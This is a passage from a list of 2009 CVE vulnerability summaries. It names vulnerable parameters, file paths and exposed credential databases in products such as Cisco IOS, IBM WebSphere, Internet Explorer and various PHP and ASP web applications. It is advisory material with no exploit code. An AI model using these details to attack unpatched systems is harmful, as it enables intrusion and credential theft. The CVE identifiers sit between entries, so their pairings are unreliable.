scripting (XSS) vulnerability in ScriptsEz Ez PHP Comment allows remote attackers to inject arbitrary web script or HTML via the name parameter. NOTE: the provenance of this information is unknown [CVE-2009-0761] Cross-site scripting (XSS) vulnerability in online.asp in Team Board 1.x allows remote attackers to inject arbitrary web script or HTML via the lookname parameter. [CVE-2009-0760] Team Board 1.x and 2.x stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing credentials via a direct request for data/team.mdb. [CVE-2009-0759] Multiple CRLF injection vulnerabilities in webadmin in ZNC before 0.066 allow remote authenticated users to modify the znc.conf configuration file and gain privileges via CRLF sequences in the quit message and other vectors. [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server. [CVE-2009-0743] Cross-site scripting (XSS) vulnerability in the edit account page in the Web Server in Cisco Unified MeetingPlace Web Conferencing 6.0 before 6.0(517.0) (aka 6.0 MR4) and 7.0 before 7.0(2) (aka 7.0 MR1) allows remote authenticated users to inject arbitrary web script or HTML via the E-mail Address field. [CVE-2009-0737] Multiple cross-site scripting (XSS) vulnerabilities in the web-based installer (config/index.php) in MediaWiki 1.6 before 1.6.12, 1.12 before 1.12.4, and 1.13 before 1.13.4, when the installer is in active use, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0736] Cross-site scripting (XSS) vulnerability in Pebble before 2.3.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0732] Downloadcenter 2.1 stores common.h under the web root with insufficient access control, which allows remote attackers to obtain user credentials and other sensitive information via a direct request. NOTE: the provenance of this information is unknown [CVE-2009-0710] Multiple cross-site scripting (XSS) vulnerabilities in PHPFootball 1.6 allow remote attackers to inject arbitrary web script or HTML via (1) the user parameter to login.php or (2) the dbfield parameter to filter.php. NOTE: the provenance of this information is unknown [CVE-2009-0703] SQL injection vulnerability in bview.asp in ASPThai.Net Webboard 6.0 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2009-0699] Cross-site scripting (XSS) vulnerability in pagesUTF8/auftrag_allgemeinauftrag.jsp in Plunet BusinessManager 4.1 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the (1) QUB and (2) Bez74 parameters. [CVE-2009-0679] Cross-site scripting (XSS) vulnerability in the Your Account module in RavenNuke 2.30 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0677] avatarlist.php in the Your Account module, reached through modules.php, in Raven Web Services RavenNuke 2.30 allows remote authenticated users to execute arbitrary code via PHP sequences in an element of the replacements array, which is processed by the preg_replace function with the eval switch, as specified in an element of the patterns array. [CVE-2009-0674] images/captcha.php in Raven Web Services RavenNuke 2.30, when register_globals and display_errors are enabled, allows remote attackers to determine the existence of local files by sending requests with full pathnames in the aFonts array parameter, and then observing the error messages, which differ between existing and nonexistent pathnames. [CVE-2009-0673] Eval injection vulnerability in the Custom Fields feature in the Your Account module in Raven Web Services RavenNuke 2.30 allows remote authenticated administrators to execute arbitrary PHP code via the ID Field Name box in a yaCustomFields action to admin.php. [CVE-2009-0672] SQL injection vulnerability in the Resend_Email module in Raven Web Services RavenNuke 2.30 allows remote authenticated administrators to execute arbitrary SQL commands via the user_prefix parameter to modules.php. [CVE-2009-0664] Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.0.x before 1.0.11 and 1.1.x before 1.1.3 allow remote attackers to inject arbitrary web script or HTML via (1) the introduction field in a user profile or (2) an arbitrary text block in a user view. [CVE-2009-0660] Multiple cross-site scripting (XSS) vulnerabilities in Mahara 1.0 before 1.0.10 and 1.1 before 1.1.2 allow remote attackers to inject arbitrary web script or HTML via a (1) profile and (2) blog, a different vulnerability than CVE-2009-0487. [CVE-2009-0649] The web browser in Symbian OS on the Nokia N95 cell phone allows remote attackers to cause a denial of service (crash) via JavaScript code that calls the setAttributeNode method. [CVE-2009-0644] The HTTP interface in Swann DVR4-SecuraNet has a certain default administrative username and password, which makes it easier for remote attackers to obtain privileged access. [CVE-2009-0640] Directory traversal vulnerability in the administrative web server in Swann DVR4-SecuraNet allows remote attackers to read arbitrary files via a .. (dot dot) in the URI, as demonstrated by reading the vy_netman.cfg file that contains passwords. [CVE-2009-0634] Multiple unspecified vulnerabilities in the home agent (HA) implementation in the (1) Mobile IP NAT Traversal feature and (2) Mobile IPv6 subsystem in Cisco IOS 12.3 through 12.4 allow remote attackers to cause a denial of service (input queue wedge and interface outage) via an ICMP packet, aka Bug ID CSCso05337. [CVE-2009-0633] Multiple unspecified vulnerabilities in the (1) Mobile IP NAT Traversal feature and (2) Mobile IPv6 subsystem in Cisco IOS 12.3 through 12.4 allow remote attackers to cause a denial of service (input queue wedge and interface outage) via MIPv6 packets, aka Bug ID CSCsm97220. [CVE-2009-0631] Unspecified vulnerability in Cisco IOS 12.0 through 12.4, when configured with (1) IP Service Level Agreements (SLAs) Responder, (2) Session Initiation Protocol (SIP), (3) H.323 Annex E Call Signaling Transport, or (4) Media Gateway Control Protocol (MGCP) allows remote attackers to cause a denial of service (blocked input queue on the inbound interface) via a crafted UDP packet. [CVE-2009-0629] The (1) Airline Product Set (aka ALPS), (2) Serial Tunnel Code (aka STUN), (3) Block Serial Tunnel Code (aka BSTUN), (4) Native Client Interface Architecture (NCIA) support, (5) Data-link switching (aka DLSw), (6) Remote Source-Route Bridging (RSRB), (7) Point to Point Tunneling Protocol (PPTP), (8) X.25 for Record Boundary Preservation (RBP), (9) X.25 over TCP (XOT), and (10) X.25 Routing features in Cisco IOS 12.2 and 12.4 allows remote attackers to cause a denial of service (device reload) via a series of crafted TCP packets. [CVE-2009-0622] Unspecified vulnerability in Cisco ACE Application Control Engine Module for Catalyst 6500 Switches and 7600 Routers before A2(1.2) and Cisco ACE 4710 Application Control Engine Appliance before A1(8a) allows remote authenticated users to execute arbitrary operating-system commands through a command line interface (CLI). [CVE-2009-0621] Cisco ACE 4710 Application Control Engine Appliance before A1(8a) uses default (1) usernames and (2) passwords for (a) the administrator, (b) web management, and (c) device management, which makes it easier for remote attackers to perform configuration changes to the Device Manager and other components, or obtain operating-system access. [CVE-2009-0620] Cisco ACE Application Control Engine Module for Catalyst 6500 Switches and 7600 Routers before A2(1.1) uses default (1) usernames and (2) passwords for (a) the administrator and (b) web management, which makes it easier for remote attackers to perform configuration changes or obtain operating-system access. [CVE-2009-0614] Unspecified vulnerability in the Web Server in Cisco Unified MeetingPlace Web Conferencing 6.0 before 6.0(517.0) (aka 6.0 MR4) and 7.0 before 7.0(2) (aka 7.0 MR1) allows remote attackers to bypass authentication and obtain administrative access via a crafted URL. [CVE-2009-0613] Trend Micro InterScan Web Security Suite (IWSS) 3.1 before build 1237 allows remote authenticated Auditor and Report Only users to bypass intended permission settings, and modify the system configuration, via requests to unspecified JSP pages. [CVE-2009-0612] Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 3.x and InterScan Web Security Suite (IWSS) 3.x, when basic authorization is enabled on the standalone proxy, forwards the Proxy-Authorization header from Windows Media Player, which allows remote web servers to obtain credentials by offering a media stream and then capturing this header. [CVE-2009-0611] Multiple cross-site scripting (XSS) vulnerabilities in qfsearch/AdminServlet in QuickFinder Server in Novell Open Enterprise Server 1.x allow remote attackers to inject arbitrary web script or HTML via (1) the siteloc parameter in a displayaddsite action, the site parameter in a (2) generalproperties or (3) clusterserviceproperties action, (4) the adminurl parameter in a global action, or (5) the print-list parameter. [CVE-2009-0603] Cross-site scripting (XSS) vulnerability in index.php in the Link module 5.x-2.5 for Drupal 5.10 allows remote authenticated users, with "administer content types" privileges, to inject arbitrary web script or HTML via the description parameter (aka the Help field). NOTE: some of these details are obtained from third party information. [CVE-2009-0594] Cross-site scripting (XSS) vulnerability in index.php in phpSkelSite 1.4 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. [CVE-2009-0575] Cross-site scripting (XSS) vulnerability in the theme_views_bulk_operations_confirmation function in views_bulk_operations.module in Views Bulk Operations 5.x before 5.x-1.3 and 6.x before 6.x-1.4, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to node titles. NOTE: some of these details are obtained from third party information. [CVE-2009-0573] Multiple cross-site scripting (XSS) vulnerabilities in FotoWeb 6.0 (Build 273) allow remote attackers to inject arbitrary web script or HTML via the (1) s parameter to cmdrequest/Login.fwx and the (2) search parameter to Grid.fwx. [CVE-2009-0571] admin.php in Ninja Designs Mailist 3.0 stores backup copies of maillist.php under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to the backup directory. [CVE-2009-0568] The RPC Marshalling Engine (aka NDR) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly maintain its internal state, which allows remote attackers to overwrite arbitrary memory locations via a crafted RPC message that triggers incorrect pointer reading, related to "IDL interfaces containing a non-conformant varying array" and FC_SMVARRAY, FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPC Marshalling Engine Vulnerability." [CVE-2009-0562] The Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 does not properly allocate memory, which allows remote attackers to execute arbitrary code via unspecified vectors that trigger "system state" corruption, aka "Office Web Components Memory Allocation Vulnerability." [CVE-2009-0554] Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0553] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0552] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 on Windows XP SP2 and SP3, and 6 on Windows Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0551] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 does not properly handle transition errors in a request for one HTTP document followed by a request for a second HTTP document, which allows remote attackers to execute arbitrary code via vectors involving (1) multiple crafted pages on a web site or (2) a web page with crafted inline content such as banner advertisements, aka "Page Transition Memory Corruption Vulnerability." [CVE-2009-0541] Multiple cross-site scripting (XSS) vulnerabilities in Magento 1.2.0 and 1.2.1.1 allow remote attackers to inject arbitrary web script or HTML via (1) the username field in an admin/ request to index.php, possibly related to the login[username] parameter and the app/code/core/Mage/Admin/Model/Session.php login function [CVE-2009-0540] Cross-site scripting (XSS) vulnerability in Libero 5.3 SP5, and possibly other versions before 5.5 SP1, allows remote attackers to inject arbitrary web script or HTML via the search term field. [CVE-2009-0533] Cross-site scripting (XSS) vulnerability in password.php in Scripts for Sites EZ Reminder allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving the u2 parameter. NOTE: the provenance of this information is unknown [CVE-2009-0532] Cross-site scripting (XSS) vulnerability in password.php in Scripts For Sites (SFS) EZ Baby allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly involving the u2 parameter. NOTE: the provenance of this information is unknown [CVE-2009-0529] Cross-site scripting (XSS) vulnerability in index.php in SnippetMaster Webpage Editor 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the language parameter. [CVE-2009-0526] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AdaptCMS Lite 1.4 allow remote attackers to inject arbitrary web script or HTML via the (1) url and (2) acuparam parameters, and (3) the URI. [CVE-2009-0525] Cross-site scripting (XSS) vulnerability in the sajax_get_common_js function in php/Sajax.php in Sajax 0.12 allows remote attackers to inject arbitrary web script or HTML via the URL parameter, which is not properly handled when using browsers that do not URL-encode requests, such as Internet Explorer 6. NOTE: the provenance of this information is unknown [CVE-2009-0524] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp 6 and 7, and RoboHelp Server 6 and 7, allows remote attackers to inject arbitrary web script or HTML via vectors involving files produced by RoboHelp. [CVE-2009-0523] Cross-site scripting (XSS) vulnerability in Adobe RoboHelp Server 6 and 7 allows remote attackers to inject arbitrary web script or HTML via a crafted URL, which is not properly handled when displaying the Help Errors log. [CVE-2009-0514] Multiple directory traversal vulnerabilities in WebFrame 0.76 allow remote attackers to include and execute arbitrary local files via directory traversal sequences in the (1) currentmod and (2) LANG parameters to mod/index.php. [CVE-2009-0513] Multiple PHP remote file inclusion vulnerabilities in WebFrame 0.76 allow remote attackers to execute arbitrary PHP code via a URL in the classFiles parameter to (1) admin/doc/index.php, (2) index.php, and (3) base/menu.php in mod/. [CVE-2009-0508] The Servlet Engine/Web Container and JSP components in IBM WebSphere Application Server (WAS) 5.1.0, 5.1.1.19, 6.0.2 before 6.0.2.35, 6.1 before 6.1.0.23, and 7.0 before 7.0.0.3 allow remote attackers to read arbitrary files contained in war files in (1) web-inf, (2) meta-inf, and unspecified other directories via unknown vectors, related to (a) web-based applications and (b) the administrative console. [CVE-2009-0507] IBM WebSphere Process Server (WPS) 6.1.2 before 6.1.2.3 and 6.2 before 6.2.0.1 does not properly restrict configuration data during an export of the cluster configuration file from the administrative console, which allows remote authenticated users to obtain the (1) JMSAPI, (2) ESCALATION, and (3) MAILSESSION (aka mail session) cleartext passwords via vectors involving access to a cluster member. [CVE-2009-0506] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 5.1 and 6.0.2 before 6.0.2.33 on z/OS, when CSIv2 Identity Assertion is enabled and Enterprise JavaBeans (EJB) interaction occurs between a WAS 6.1 instance and a WAS pre-6.1 instance, allows local users to have an unknown impact via vectors related to (1) use of the wrong subject and (2) multiple CBIND checks. [CVE-2009-0504] WSPolicy in the Web Services component in IBM WebSphere Application Server (WAS) 7.0.x before 7.0.0.1 does not properly recognize the IDAssertion.isUsed binding property, which allows local users to discover a password by reading a SOAP message. [CVE-2009-0503] IBM WebSphere Message Broker 6.1.x before 6.1.0.2 writes a database connection password to the Event Log and System Log during exception handling for a JDBC error, which allows local users to obtain sensitive information by reading these logs. [CVE-2009-0502] Cross-site scripting (XSS) vulnerability in blocks/html/block_html.php in Snoopy 1.2.3, as used in Moodle 1.6 before 1.6.9, 1.7 before 1.7.7, 1.8 before 1.8.8, and 1.9 before 1.9.4, allows remote attackers to inject arbitrary web script or HTML via an HTML block, which is not properly handled when the "Login as" feature is used to visit a MyMoodle or Blog page. [CVE-2009-0500] Cross-site scripting (XSS) vulnerability in course/lib.php in Moodle 1.6 before 1.6.9, 1.7 before 1.7.7, 1.8 before 1.8.8, and 1.9 before 1.9.4 allows remote attackers to inject arbitrary web script or HTML via crafted log table information that is not properly handled when it is displayed in a log report. [CVE-2009-0498] Virtual GuestBook (vgbook) 2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request to guestbook.mdb. [CVE-2009-0496] Multiple cross-site scripting (XSS) vulnerabilities in Ignite Realtime Openfire 3.6.2 allow remote attackers to inject arbitrary web script or HTML via the (1) log parameter to (a) logviewer.jsp and (b) log.jsp [CVE-2009-0488] Cross-site scripting (XSS) vulnerability in Phorum before 5.2.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2009-0487] Cross-site scripting (XSS) vulnerability in Mahara before 1.0.9 allows remote attackers to inject arbitrary web script or HTML via a crafted forum post. [CVE-2009-0481] Bugzilla 2.x before 2.22.7, 3.0 before 3.0.7, 3.2 before 3.2.1, and 3.3 before 3.3.2 allows remote authenticated users to conduct cross-site scripting (XSS) and related attacks by uploading HTML and JavaScript attachments that are rendered by web browsers. [CVE-2009-0470] Multiple cross-site scripting (XSS) vulnerabilities in the HTTP server in Cisco IOS 12.4(23) allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under (1) level/15/exec/-/ or (2) exec/, a different vulnerability than CVE-2008-3821. [CVE-2009-0468] Multiple cross-site request forgery (CSRF) vulnerabilities in ajax.html in Profense Web Application Firewall 2.6.2 and 2.6.3 allow remote attackers to hijack the authentication of administrators for requests that (1) shutdown the server, (2) send ping packets, (3) enable network services, (4) configure a proxy server, and (5) modify other settings via parameters in the query string. [CVE-2009-0467] Cross-site scripting (XSS) vulnerability in proxy.html in Profense Web Application Firewall 2.6.2 and 2.6.3 allows remote attackers to inject arbitrary web script or HTML via the proxy parameter in a deny_log manage action. [CVE-2009-0466] Cross-site scripting (XSS) vulnerability in Vivvo CMS before 4.1.1 allows remote attackers to inject arbitrary web script or HTML via a URI that triggers a 404 Page Not Found response. [CVE-2009-0455] Cross-site scripting (XSS) vulnerability in the anonymous comments feature in lib-comment.php in glFusion 1.1.0, 1.1.1, and earlier versions allows remote attackers to inject arbitrary web script or HTML via the username parameter to comment.php. [CVE-2009-0446] SQL injection vulnerability in photo.php in WEBalbum 2.4b allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2009-0440] IBM WebSphere Partner Gateway (WPG) 6.0.0 through 6.0.0.7 does not properly handle failures of signature verification, which might allow remote authenticated users to submit a crafted RosettaNet (aka RNIF) document to a backend application, related to (1) "altered service content" and (2) "digital signature foot-print." [CVE-2009-0439] Unspecified vulnerability in the queue manager in IBM WebSphere MQ (WMQ) 5.3, 6.0 before 6.0.2.6, and 7.0 before 7.0.0.2 allows local users to gain privileges via vectors related to the (1) setmqaut, (2) dmpmqaut, and (3) dspmqaut authorization commands. [CVE-2009-0438] IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows allows remote attackers to bypass "Authorization checking" and obtain sensitive information from JSP pages via a crafted request. NOTE: this is probably a duplicate of CVE-2008-5412. [CVE-2009-0437] The Installation Factory installation process for IBM WebSphere Application Server (WAS) 6.0.2 on Windows, when WAS is registered as a Windows service, allows local users to obtain sensitive information by reading the logs/instconfigifwas6.log log file. [CVE-2009-0436] The (1) mod_ibm_ssl and (2) mod_cgid modules in IBM HTTP Server 6.0.x before 6.0.2.31 and 6.1.x before 6.1.0.19, as used in WebSphere Application Server (WAS), set incorrect permissions for AF_UNIX sockets, which has unknown impact and local attack vectors. [CVE-2009-0435] Unspecified vulnerability in the IBM Asynchronous I/O (aka AIO or libibmaio) library in the Java Message Service (JMS) component in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.17 on AIX 5.3 allows attackers to cause a denial of service (daemon crash) via vectors related to the aio_getioev2 and getEvent methods. [CVE-2009-0434] PerfServlet in the PMI/Performance Tools component in IBM WebSphere Application Server (WAS) 6.0.x before 6.0.2.31, 6.1.x before 6.1.0.21, and 7.0.x before 7.0.0.1, when Performance Monitoring Infrastructure (PMI) is enabled, allows local users to obtain sensitive information by reading the (1) systemout.log and (2) ffdc files. NOTE: this is probably a duplicate of CVE-2008-5413. [CVE-2009-0433] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 5.1.x before 5.1.1.19, 6.0.x before 6.0.2.29, and 6.1.x before 6.1.0.19, when Web Server plug-in content buffering is enabled, allows attackers to cause a denial of service (daemon crash) via unknown vectors, related to a mishandling of client read failures in which clients receive many 500 HTTP error responses and backend servers are incorrectly labeled as down. [CVE-2009-0432] The installation process for the File Transfer servlet in the System Management/Repository component in IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.19 does not enable the secure version, which allows remote attackers to obtain sensitive information via unspecified vectors. [CVE-2009-0430] Multiple cross-site scripting (XSS) vulnerabilities in Active Bids allow remote attackers to inject arbitrary web script or HTML via the (1) search parameter to search.asp and the (2) URL parameter to tellafriend.asp. [CVE-2009-0424] Cross-site scripting (XSS) vulnerability in sign1.php in AN Guestbook (ANG) before 0.7.7 allows remote attackers to inject arbitrary web script or HTML via the country parameter, which is not properly handled in (1) administrator/manage.php or (2) administrator/trash.php. NOTE: some of these details are obtained from third party information. [CVE-2009-0419] Microsoft XML Core Services, as used in Microsoft Expression Web, Office, Internet Explorer 6 and 7, and other products, does not properly restrict access from web pages to Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly protection mechanism. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2008-4033. [CVE-2009-0417] Cross-site scripting (XSS) vulnerability in the AgaviWebRouting::gen(null) method in Agavi 0.11 before 0.11.6 and 1.0 before 1.0.0 beta 8 allows remote attackers to inject arbitrary web script or HTML via a crafted URL with certain characters that are not properly handled by web browsers that do not strictly follow RFC 3986, such as Internet Explorer 6 and 7. [CVE-2009-0413] Cross-site scripting (XSS) vulnerability in RoundCube Webmail (roundcubemail) 0.2 stable allows remote attackers to inject arbitrary web script or HTML via the background attribute embedded in an HTML e-mail message. [CVE-2009-0411] Google Chrome before 1.0.154.46 does not properly restrict access from web pages to the (1) Set-Cookie and (2) Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls and other web script. [CVE-2009-0404] Multiple cross-site scripting (XSS) vulnerabilities in Bioinformatics htmLawed 1.1.3 and 1.1.4 allow remote attackers to inject arbitrary web script or HTML via invalid Cascading Style Sheets (CSS) expressions in the style attribute, which is processed by Internet Explorer 7. [CVE-2009-0393] Cross-site scripting (XSS) vulnerability in sysconf.cgi in Motorola Wimax modem CPEi300 allows remote authenticated users to inject arbitrary web script or HTML via the page parameter. [CVE-2009-0391] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.0.1 on z/OS allows attackers to read arbitrary files via unknown vectors. [CVE-2009-0389] Multiple insecure method vulnerabilities in the Web On Windows (WOW) ActiveX control in WOW ActiveX 2 allow remote attackers to (1) create and overwrite arbitrary files via the WriteIniFileString method, (2) execute arbitrary programs via the ShellExecute method, (3) read from the registry via unspecified vectors, and (4) write to the registry via unspecified vectors. NOTE: vectors 1 and 2 can be used together to execute arbitrary code. [CVE-2009-0378] Cross-site scripting (XSS) vulnerability in index.php in the beamospetition (com_beamospetition) 1.0.12 component for Joomla! allows remote attackers to inject arbitrary web script or HTML via the pet parameter in a sign action. [CVE-2009-0364] Format string vulnerability in the mini_calendar component in Citadel.org WebCit 7.22, and other versions before 7.39, allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2009-0359] Multiple cross-site scripting (XSS) vulnerabilities in Samizdat before 0.6.2 allow remote authenticated users to inject arbitrary web script or HTML via the (1) message title or (2) user full name. [CVE-2009-0357] Mozilla Firefox before 3.0.6 and SeaMonkey before 1.1.15 do not properly restrict access from web pages to the (1) Set-Cookie and (2) Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly protection mechanism. [CVE-2009-0347] Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter. [CVE-2009-0339] SQL injection vulnerability in inc_webblogmanager.asp in DMXReady Blog Manager allows remote attackers to execute arbitrary SQL commands via the itemID parameter in a view action. [CVE-2009-0338] Cross-site scripting (XSS) vulnerability in inc_webblogmanager.asp in DMXReady Blog Manager allows remote attackers to inject arbitrary web script or HTML via the CategoryID parameter in a refer action. [CVE-2009-0336] Katy Whitton BlogIt! stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing user credentials via a direct request for database/Blog.mdb. NOTE: some of these details are obtained from third party information. [CVE-2009-0335] Cross-site scripting (XSS) vulnerability in index.asp in Katy Whitton BlogIt! allows remote attackers to inject arbitrary web script or HTML via the view parameter. [CVE-2009-0333] SQL injection vulnerability in the WebAmoeba (WA) Ticket System (com_waticketsystem) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a category action to index.php. [CVE-2009-0328] ROBS-PROJECTS Digital Sales IPN (aka DS-IPN.NET or DS-IPN Paypal Shop) stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file containing user credentials via a direct request for Database/Sales.mdb. [CVE-2009-0323] Multiple stack-based buffer overflows in W3C Amaya Web Browser 10.0 and 11.0 allow remote attackers to execute arbitrary code via (1) a long type parameter in an input tag, which is not properly handled by the EndOfXmlAttributeValue function [CVE-2009-0316] Untrusted search path vulnerability in src/if_python.c in the Python interface in Vim before 7.2.045 allows local users to execute arbitrary code via a Trojan horse Python file in the current working directory, related to a vulnerability in the PySys_SetArgv function (CVE-2008-5983), as demonstrated by an erroneous search path for plugin/bike.vim in bicyclerepair. [CVE-2009-0312] Cross-site scripting (XSS) vulnerability in the antispam feature (security/antispam.py) in MoinMoin 1.7 and 1.8.1 allows remote attackers to inject arbitrary web script or HTML via crafted, disallowed content. [CVE-2009-0307] Cross-site scripting (XSS) vulnerability in the "Customize Statistics Page" (admin/statistics/ConfigureStatistics) in the MDS Connection Service in Research in Motion (RIM) BlackBerry Enterprise Server (BES) before 4.1.6 MR5 allows remote attackers to inject arbitrary web script or HTML via the (1) customDate, (2) interval, (3) lastCustomInterval, (4) lastIntervalLength, (5) nextCustomInterval, (6) nextIntervalLength, (7) action, (8) delIntervalIndex, (9) addStatIndex, (10) delStatIndex, and (11) referenceTime parameters. [CVE-2009-0306] Buffer overflow in the IBM Lotus Notes Intellisync ActiveX control in lnresobject.dll in BlackBerry Desktop Manager in Research In Motion (RIM) BlackBerry Desktop Software before 5.0.1 allows remote attackers to execute arbitrary code via a crafted web page. NOTE: some of these details are obtained from third party information. [CVE-2009-0305] Multiple stack-based buffer overflows in the Research in Motion RIM AxLoader ActiveX control in AxLoader.ocx and AxLoader.dll in BlackBerry Application Web Loader 1.0 allow remote attackers to execute arbitrary code via unspecified use of the (1) load or (2) loadJad method. [CVE-2009-0303] Cross-site scripting (XSS) vulnerability in Web Help Desk before 9.1.18 allows remote attackers to inject arbitrary web script or HTML via vectors related to "encoded JavaScript" and Helpdesk.woa. [CVE-2009-0285] Cross-site scripting (XSS) vulnerability in error.asp in BBSXP 5.13 and earlier allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2009-0283] Cross-site scripting (XSS) vulnerability in err.asp in Oblog allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2009-0278] Sun Java System Application Server (AS) 8.1 and 8.2 allows remote attackers to read the Web Application configuration files in the (1) WEB-INF or (2) META-INF directory via a malformed request. [CVE-2009-0274] Unspecified vulnerability in WebAccess in Novell GroupWise 6.5, 7.0, 7.01, 7.02x, 7.03, 7.03HP1a, and 8.0 might allow remote attackers to obtain sensitive information via a crafted URL, related to conversion of POST requests to GET requests. [CVE-2009-0273] Multiple cross-site scripting (XSS) vulnerabilities in Novell GroupWise WebAccess 6.5x, 7.0, 7.01, 7.02x, 7.03, 7.03HP1a, and 8.0 allow remote attackers to inject arbitrary web script or HTML via the (1) User.id and (2) Library.queryText parameters to gw/webacc, and other vectors involving (3) HTML e-mail and (4) HTML attachments. [CVE-2009-0272] Cross-site request forgery (CSRF) vulnerability in Novell GroupWise WebAccess 6.5x, 7.0, 7.01, 7.02x, 7.03, 7.03HP1a, and 8.0 allows remote attackers to insert e-mail forwarding rules, and modify unspecified other configuration settings, as arbitrary users via unknown vectors. [CVE-2009-0260] Multiple cross-site scripting (XSS) vulnerabilities in action/AttachFile.py in MoinMoin before 1.8.1 allow remote attackers to inject arbitrary web script or HTML via an AttachFile action to the WikiSandBox component with (1) the rename parameter or (2) the drawing parameter (aka the basename variable). [CVE-2009-0257] Multiple cross-site scripting (XSS) vulnerabilities in TYPO3 4.0.0 through 4.0.9, 4.1.0 through 4.1.7, and 4.2.0 through 4.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) content of indexed files to the (a) Indexed Search Engine (indexed_search) system extension [CVE-2009-0256] Session fixation vulnerability in the authentication library in TYPO3 4.0.0 through 4.0.9, 4.1.0 through 4.1.7, and 4.2.0 through 4.2.3 allows remote attackers to hijack web sessions via unspecified vectors related to (1) frontend and (2) backend authentication. [CVE-2009-0252] Multiple SQL injection vulnerabilities in default.asp in Enthrallweb eReservations allow remote attackers to execute arbitrary SQL commands via the (1) Login parameter (aka username field) or the (2) Password parameter (aka password field). NOTE: some of these details are obtained from third party information. [CVE-2009-0250] Ryneezy phoSheezy 0.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the file containing the administrator's password hash via a direct request for config/password. [CVE-2009-0249] Katy Whitton RankEm stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing credentials via a direct request for database/topsites.mdb. [CVE-2009-0248] Cross-site scripting (XSS) vulnerability in rankup.asp in Katy Whitton RankEm allows remote attackers to inject arbitrary web script or HTML via the siteID parameter. [CVE-2009-0247] The server for 53KF Web IM 2009 Home, Professional, and Enterprise editions relies on client-side protection mechanisms against cross-site scripting (XSS), which allows remote attackers to conduct XSS attacks by using a modified client to send a crafted IM message, related to the msg variable. [CVE-2009-0245] Cross-site scripting (XSS) vulnerability in Usagi Project MyNETS 1.2.0.1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-4629. [CVE-2009-0240] listing.php in WebSVN 2.0 and possibly 1.7 beta, when using an SVN authz file, allows remote authenticated users to read changelogs or diffs for restricted projects via a modified repname parameter. [CVE-2009-0239] Cross-site scripting (XSS) 